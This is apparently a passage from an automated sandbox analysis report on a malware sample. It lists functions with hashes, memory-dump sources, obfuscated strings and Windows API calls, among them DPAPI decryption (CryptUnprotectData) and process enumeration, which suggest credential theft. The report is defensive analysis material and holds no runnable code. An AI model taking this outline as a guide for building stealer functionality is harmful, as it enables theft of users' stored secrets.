                              • Instruction ID: 4b829e47c6a95e984e42e19253c054ce3ab174dd404958388c8a08e245883b61
                              • Opcode Fuzzy Hash: 3b38c560db51f99dd1abe15451d01eb4f2d894ef48929371161b355373a33433
                              • Instruction Fuzzy Hash: BEB238F36082009FE3046E2DEC8567ABBE5EFD4720F2A493DE6C5C3744EA3598458697
                              Function 00912FE3 Relevance: 7.9, Strings: 5, Instructions: 1631COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,?y{$7<_$U0}o$a0ri$nU~}
                              • API String ID: 0-3470698434
                              • Opcode ID: 397105f89a7ee2ff531f0854cc42850713b119815b93b9739de2b0938a18ca32
                              • Instruction ID: 203aae56dde40c4f0aa4aa23df41304e110981a3fdba1eac4f3eb76f9470d877
                              • Opcode Fuzzy Hash: 397105f89a7ee2ff531f0854cc42850713b119815b93b9739de2b0938a18ca32
                              • Instruction Fuzzy Hash: D9B218F360C2049FE304AE2DEC4567ABBE9EFD4720F1A893DE6C5C3744E63598058696
                              Function 00916730 Relevance: 7.8, Strings: 5, Instructions: 1575COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: _q}$;7?$;q~$_5*$ru
                              • API String ID: 0-3192713602
                              • Opcode ID: 2dec3b413a62165863d6bf85821e320d13cf969c3b3208a7c410766979820338
                              • Instruction ID: 72563e4bb0d2c6d1c32ba14c30b7fff51471b9516a2d9c5dbbf4f8227d270415
                              • Opcode Fuzzy Hash: 2dec3b413a62165863d6bf85821e320d13cf969c3b3208a7c410766979820338
                              • Instruction Fuzzy Hash: 9EB2D3F390C2049FE3046E29EC8567AFBE9EF94720F1A4A3DEAC593740E63558058797
                              Function 0091ECC6 Relevance: 7.8, Strings: 5, Instructions: 1554COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !~ns$=?]$OQ}m$OQ}m$q#\~
                              • API String ID: 0-106341672
                              • Opcode ID: 60001459fc13d3a4ae0626cbf12f1a6dc350338a1ee5ebf97eed7e07130fdff6
                              • Instruction ID: 5dbb6eaee61b374a68352b017f956b757e96e814b7ac9dd2267e723f6983163d
                              • Opcode Fuzzy Hash: 60001459fc13d3a4ae0626cbf12f1a6dc350338a1ee5ebf97eed7e07130fdff6
                              • Instruction Fuzzy Hash: 5DA2F4F36082049FE304AF29EC8567AFBE9EF94720F16493DE6C4C7344EA3598458697
                              Function 0052F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: \u$\u${${$}$}
                              • API String ID: 0-582841131
                              • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                              • Instruction ID: f0d1b8d5b64cf7214e078a490a3be4ba01a94168d5ac6bb095d2673e04fa80ed
                              • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                              • Instruction Fuzzy Hash: 7D416B12E19BD9C5CB058B7454A02AEBFB23FE6210F6D83AAC49D1F3C2C774414AD3A5
                              Function 004CC920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004CC971
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004CC97C
                              • lstrcat.KERNEL32(?,004E0B47), ref: 004CCA43
                              • lstrcat.KERNEL32(?,004E0B4B), ref: 004CCA57
                              • lstrcat.KERNEL32(?,004E0B4E), ref: 004CCA78
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 6928be8054f9fdb570b54065a55a05d877076c974623b16a9e78c3c72b20d6f2
                              • Instruction ID: d9b0b3b120397bdb758fe0c9223746c703f5c618aaa3c36ed04d54085fdddd13
                              • Opcode Fuzzy Hash: 6928be8054f9fdb570b54065a55a05d877076c974623b16a9e78c3c72b20d6f2
                              • Instruction Fuzzy Hash: B5416274D1421D9FDB10CFA4DC89FFEB778BB44304F1041A9E509A6280D7796A84CF99
                              Function 004C72A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004C72AD
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C72B4
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004C72E1
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004C7304
                              • LocalFree.KERNEL32(?), ref: 004C730E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 325f425db6edeacdec837dfb60648e0c2acb6798c6988d46283cceec7213e6c7
                              • Instruction ID: f531ddc8ff49e65dae3ab56dc42904f5ba3808fc07853087f0f1beef13f2e57c
                              • Opcode Fuzzy Hash: 325f425db6edeacdec837dfb60648e0c2acb6798c6988d46283cceec7213e6c7
                              • Instruction Fuzzy Hash: 5B015E75A54308BBDB14DFE4DC46FAE7778BB44B00F10814AFB05AB2C0C6B4AA01CB68
                              Function 004D9790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D97AE
                              • Process32First.KERNEL32(004E0ACE,00000128), ref: 004D97C2
                              • Process32Next.KERNEL32(004E0ACE,00000128), ref: 004D97D7
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004D97EC
                              • CloseHandle.KERNEL32(004E0ACE), ref: 004D980A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 81dbbfe1ba781d3151882db50f26fb85ae11b2ba8f412ce3d017d7b488f8181a
                              • Instruction ID: d872158cf57dda68381c608e03b15582756c7d8881c2b0c4170397253e53e998
                              • Opcode Fuzzy Hash: 81dbbfe1ba781d3151882db50f26fb85ae11b2ba8f412ce3d017d7b488f8181a
                              • Instruction Fuzzy Hash: 98014C75A20208EBDB24DFA4CD54BDEB7B8BB48700F00818AF509E6340E7389E40DF64
                              Function 004E4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <7\h$huzx
                              • API String ID: 0-2989614873
                              • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                              • Instruction ID: 46bf109dcb8878c8f4bcdc4854e6b4f93d4ae234fa78774ecdb6ad02f078bfc9
                              • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                              • Instruction Fuzzy Hash: 8163743241EBD41EC727DB3247B21527F66BB132163194ACFC8C18F5B3C6989A16E35A
                              Function 0090F9FD Relevance: 6.6, Strings: 4, Instructions: 1649COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !M<$WV|t$%lo$il0
                              • API String ID: 0-948028024
                              • Opcode ID: c3500137bf617885c3fb34ef8b54024b269509001bd557bb7da370f2d85e30da
                              • Instruction ID: b25ac57153e1963c78ee02e7af76aa0f1627db1615f071bd9c397c402a48b414
                              • Opcode Fuzzy Hash: c3500137bf617885c3fb34ef8b54024b269509001bd557bb7da370f2d85e30da
                              • Instruction Fuzzy Hash: 68B2F5F360C6049FE304AE29EC8567AFBE5EFD4720F1A4A3DEAC4C3744E63558058696
                              Function 00919BF8 Relevance: 6.6, Strings: 4, Instructions: 1638COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .)Ml$:-|+$IAnw$]J{W
                              • API String ID: 0-1110005669
                              • Opcode ID: c182ce9470bff35d2f8322b35333090315967807b81a49ce43a8b99950801326
                              • Instruction ID: 54b6154f6e4430843aebfca61be868ddd689a92d75342b06eb21fa11a33a3ff8
                              • Opcode Fuzzy Hash: c182ce9470bff35d2f8322b35333090315967807b81a49ce43a8b99950801326
                              • Instruction Fuzzy Hash: 0DB215F3A086049FE3046E2DEC8567AFBE9EFD4260F1A493DE6C5C3744EA3558058792
                              Function 004D9030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,004C51D4,40000001,00000000,00000000,?,004C51D4), ref: 004D9050
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: 3ca256cdd6e117dcaa4f7a09e0f69f2d9f6233c2742ab8fd37cf4ab8c1545f25
                              • Instruction ID: d1c38e66574d1647e761db6ab5f01040e0e8560361c3e32d90f89b53b14a9073
